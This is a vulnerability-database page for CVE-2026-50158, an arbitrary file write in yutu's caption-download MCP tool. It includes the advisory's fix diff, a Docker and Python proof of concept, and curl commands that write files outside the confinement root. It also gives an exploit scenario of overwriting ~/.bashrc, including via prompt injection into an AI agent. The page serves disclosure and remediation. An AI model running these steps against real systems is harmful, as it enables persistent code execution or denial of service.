Skip to main content

yutu CVE-2026-50158

HIGH
External Control of File Name or Path (CWE-73)
2026-07-14 https://github.com/eat-pray-ai/yutu GHSA-2c7f-fxww-6w6c
7.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.7 HIGH
AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
vuln.today AI
7.7 HIGH

MCP endpoint is local and unauthenticated by default (AV:L, PR:N, UI:N); arbitrary overwrite gives high integrity and availability impact but no read, so C:N; scope unchanged as writes stay within the process's OS rights.

3.1 AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 14, 2026 - 20:42 vuln.today
Analysis Generated
Jul 14, 2026 - 20:42 vuln.today
CVE Published
Jul 14, 2026 - 19:34 github-advisory
HIGH 7.7

DescriptionGitHub Advisory

Arbitrary File Write via MCP caption-download Tool

Summary

The caption-download MCP tool in yutu passes the caller-supplied file parameter directly to os.Create() at pkg/caption/caption.go:272 without any path validation, canonicalization, or confinement to the pkg.Root boundary (YUTU_ROOT). A local attacker - or any process able to reach the HTTP MCP server - can write arbitrary content to any path writable by the yutu process, entirely outside the intended working directory. This is a High severity vulnerability (CVSS 7.7) with high integrity and availability impact.

Details

yutu uses pkg.Root (backed by Go 1.24's os.OpenRoot) to restrict all file I/O to the YUTU_ROOT directory. Every other caption file-write path honours this boundary:

MethodSinkConfined?
Caption.Insert()pkg.Root.Open(c.File) (caption.go:109)Yes
Caption.Update()pkg.Root.Open(c.File) (caption.go:193)Yes
Caption.Download()os.Create(c.File) (caption.go:272)No

Caption.Download() is the sole outlier. The attacker-controlled file field flows without restriction from the MCP tool input schema to a raw os.Create() call:

  1. Source - cmd/caption/download.go:32-41: downloadInSchema declares file as a required string field in the MCP JSON input schema.
  2. Binding - cmd/caption/download.go:61-64: cobramcp.GenToolHandler maps MCP input to input.Download(writer).
  3. Sink - pkg/caption/caption.go:272: os.Create(c.File) creates or truncates the file at the attacker-supplied path.
  4. Write - pkg/caption/caption.go:280: file.Write(body) writes the downloaded caption bytes to that path.
go
// cmd/caption/download.go
var downloadInSchema = &jsonschema.Schema{
    Required: []string{"ids", "file"},          // line 34
    // ...
    "file": {Type: "string", Description: fileUsage},  // line 40
}

// cobramcp.GenToolHandler binds MCP → handler (line 61-64)
cobramcp.GenToolHandler(downloadTool, func(input caption.Caption, writer io.Writer) error {
    return input.Download(writer)
})

// pkg/caption/caption.go
body, err := io.ReadAll(res.Body)   // line 267
file, err := os.Create(c.File)      // line 272  ← unconfined sink
// ...
_, err = file.Write(body)           // line 280

The caption-download tool is registered by default in init() at cmd/caption/download.go:52, and the HTTP MCP server starts with --auth defaulting to false (cmd/mcp.go:42), meaning no authentication is required for local HTTP callers.

Recommended fix:

diff
--- a/pkg/caption/caption.go
+++ b/pkg/caption/caption.go
@@
-       file, err := os.Create(c.File)
+       file, err := pkg.Root.OpenFile(c.File, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
        if err != nil {
                return errors.Join(errDownloadCaption, err)
        }

PoC

Prerequisites:

  • yutu 0.0.0-dev / commit 351c99d
  • Valid YUTU_CREDENTIAL and YUTU_CACHE_TOKEN available
  • yutu MCP server running in HTTP mode

Docker-based reproduction (no live credentials needed):

The self-contained PoC builds a binary that exercises caption.Download() directly inside a container, with YUTU_ROOT=/tmp/yutu_safe_root as the confinement boundary.

bash
# From the report workspace root:
docker build --no-cache -t yutu-vuln001-poc \
    -f vuln-001/Dockerfile \
    reports/mcp_49_eat-pray-ai__yutu

docker run --rm yutu-vuln001-poc

Expected output confirms:

  • pkg.Root.Open("/tmp/poc-arbitrary-write.txt") is correctly rejected with path escapes from parent (control).
  • caption.Download() with file="/tmp/poc-arbitrary-write.txt" succeeds and creates a 79-byte file outside YUTU_ROOT (exploit).

Live MCP server reproduction:

bash
# Start the HTTP MCP server (no auth by default)
yutu mcp --mode http --port 8216
# Initialise session
curl -sD /tmp/yutu.headers \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  http://localhost:8216/mcp \
  -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"poc","version":"1"}}}' \
  >/tmp/yutu.init

SID=$(awk 'tolower($1)=="mcp-session-id:"{print $2}' /tmp/yutu.headers | tr -d '\r')
# Exploit: write caption to arbitrary path
# Replace CAPTION_ID with a caption id accessible by the configured token
curl -s \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  ${SID:+-H "Mcp-Session-Id: $SID"} \
  http://localhost:8216/mcp \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"caption-download","arguments":{"ids":["CAPTION_ID"],"file":"/tmp/yutu-cve-poc.srt","tfmt":"srt"}}}'
# Verify file was written outside YUTU_ROOT
test -s /tmp/yutu-cve-poc.srt && ls -l /tmp/yutu-cve-poc.srt

Impact

This is an Arbitrary File Write vulnerability. Any principal that can invoke the caption-download MCP tool - including an unauthenticated local process when the HTTP MCP server is running with default settings (--auth false) - can write attacker-controlled bytes to any file path accessible to the yutu process. This bypasses the YUTU_ROOT confinement boundary that all other file-write operations in yutu respect.

Potential consequences include:

  • Overwriting application binaries, configuration files, or shell startup scripts to achieve persistent code execution.
  • Corrupting log files or database files to cause denial of service.
  • Writing web-accessible files in deployments where yutu runs alongside a web server.
  • Exploitable via prompt injection into an AI agent that uses the yutu MCP server, since the file parameter is fully attacker-controlled with no guardrails.

Impacted parties: operators running yutu as an MCP server (HTTP mode, default configuration), AI agent pipelines that expose caption-download to untrusted input, and any user whose machine hosts a yutu process that a local attacker can reach.

Reproduction artifacts

Dockerfile
dockerfile
# VULN-001 PoC Dockerfile
# Build con: reports/mcp_49_eat-pray-ai__yutu/
# repo/ - the cloned yutu repository
# vuln-001/ - this workspace (Dockerfile, poc_main.go)

FROM golang:1.26 AS builder
WORKDIR /build
# Copy the yutu source tree (provides the vulnerable packages)
COPY repo/ .
# Inject PoC as a new command package (does not modify existing source)
RUN mkdir -p cmd/poc_exploit
COPY vuln-001/poc_main.go cmd/poc_exploit/main.go
# Build the PoC binary (static, no CGO needed)
RUN CGO_ENABLED=0 go build -o /poc ./cmd/poc_exploit/
# ── Runtime stage ──────────────────────────────────────────────────────────
FROM debian:12-slim

COPY --from=builder /poc /poc
# YUTU_ROOT defines the pkg.Root confinement boundary.
# The PoC writes to /tmp/poc-arbitrary-write.txt which is OUTSIDE this root,
# demonstrating the os.Create bypass.
ENV YUTU_ROOT=/tmp/yutu_safe_root

RUN mkdir -p /tmp/yutu_safe_root

CMD ["/poc"]
poc.py
python
#!/usr/bin/env python3
"""
VULN-001 PoC Runner
Exploit: Arbitrary File Write via MCP caption-download (CWE-73)
Target : pkg/caption/caption.go:272 -- os.Create(c.File) without pkg.Root confinement

Usage: python3 poc.py
"""
import os
import subprocess
import sys

VULN_DIR = os.path.dirname(os.path.abspath(__file__))
CONTEXT_DIR = os.path.dirname(VULN_DIR)
# mcp_49_eat-pray-ai__yutu/
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
IMAGE_NAME = "yutu-vuln001-poc"


def run(cmd, check=False, **kwargs):
 print("$ " + " ".join(str(a) for a in cmd))
 result = subprocess.run(cmd, =True, **kwargs)
 return result


def main():
 print("=" * 70)
 print("VULN-001: Arbitrary File Write via MCP caption-download")
 print("CWE-73 | pkg/caption/caption.go:272 | os.Create(c.File)")
 print("=" * 70)
# ── Build ────────────────────────────────────────────────────────────────
 build_cmd = [
 "docker", "build",
 "--no-cache",
 "-t", IMAGE_NAME,
 "-f", DOCKERFILE,
 CONTEXT_DIR,
 ]
 print("\n[Step 1] Building Docker image ...")
 result = run(build_cmd, capture_output=False)
 if result.returncode != 0:
 print("\n[FAIL] Docker build failed.", file=sys.stderr)
 sys.exit(1)
# ── Run ──────────────────────────────────────────────────────────────────
 run_cmd = ["docker", "run", "--rm", IMAGE_NAME]
 print("\n[Step 2] Running PoC container ...")
 result = run(run_cmd, capture_output=True)

 stdout = result.stdout or ""
 stderr = result.stderr or ""
 print(stdout, end="")
 if stderr:
 print(stderr, end="", file=sys.stderr)
# ── Verdict ──────────────────────────────────────────────────────────────
 passed = (
 result.returncode == 0
 and "VULNERABILITY CONFIRMED" in stdout
 and "PASS" in stdout
 and "os.Create bypasses pkg.Root" in stdout
 )

 if passed:
 print("\n[RESULT] PASS - vulnerability dynamically reproduced.")
 else:
 print(f"\n[RESULT] FAIL - container exit code {result.returncode}.", file=sys.stderr)
 sys.exit(1)


if __name__ == "__main__":
 main()

AnalysisAI

Arbitrary file write in yutu, a Go-based YouTube CLI and MCP server, lets any caller of the built-in caption-download MCP tool place attacker-controlled bytes at any filesystem path the yutu process can write to. The vulnerable Caption.Download() calls os.Create() on the caller-supplied file parameter, bypassing the YUTU_ROOT (pkg.Root/os.OpenRoot) confinement that every other caption write path enforces. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach unauthenticated HTTP MCP endpoint
Delivery
Call caption-download with absolute/traversal file path
Exploit
os.Create writes bytes outside YUTU_ROOT
Execution
Overwrite shell rc, binary, or web file
Impact
Persistent code execution or denial of service

Vulnerability AssessmentAI

Exploitation Exploitation requires the yutu MCP server to be running in HTTP mode (yutu mcp --mode http) with the default --auth=false so no attacker authentication is needed, and the server must have valid YUTU_CREDENTIAL and YUTU_CACHE_TOKEN configured plus a reachable caption id, because the write is fed by bytes that Caption.Download() first fetches from YouTube. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 3.1 vector (AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H, 7.7 High) is internally consistent with the finding: local attack surface, no attacker authentication because the HTTP MCP server defaults to --auth=false, and high integrity/availability impact from arbitrary overwrite with no confidentiality read. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An operator runs `yutu mcp --mode http` on a workstation with valid YouTube credentials configured and the default --auth=false. A local process (or an AI agent tricked via prompt injection) sends a tools/call for caption-download with file set to "/home/user/.bashrc" or a path under a web root; yutu downloads caption bytes and writes them over that file, enabling persistent code execution or denial of service. …
Remediation Vendor-released patch: upgrade to yutu 0.10.9-dev1 or later, which replaces the unconfined os.Create with pkg.Root.OpenFile so the download path honours the YUTU_ROOT boundary (fix commit https://github.com/eat-pray-ai/yutu/commit/87026c4eee1ed28775383807087343a750707bf3, release https://github.com/eat-pray-ai/yutu/releases/tag/v0.10.9-dev1, advisory https://github.com/eat-pray-ai/yutu/security/advisories/GHSA-2c7f-fxww-6w6c). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Immediately inventory all systems running yutu and disable or restrict access to the caption-download MCP tool if operationally feasible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-50158 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy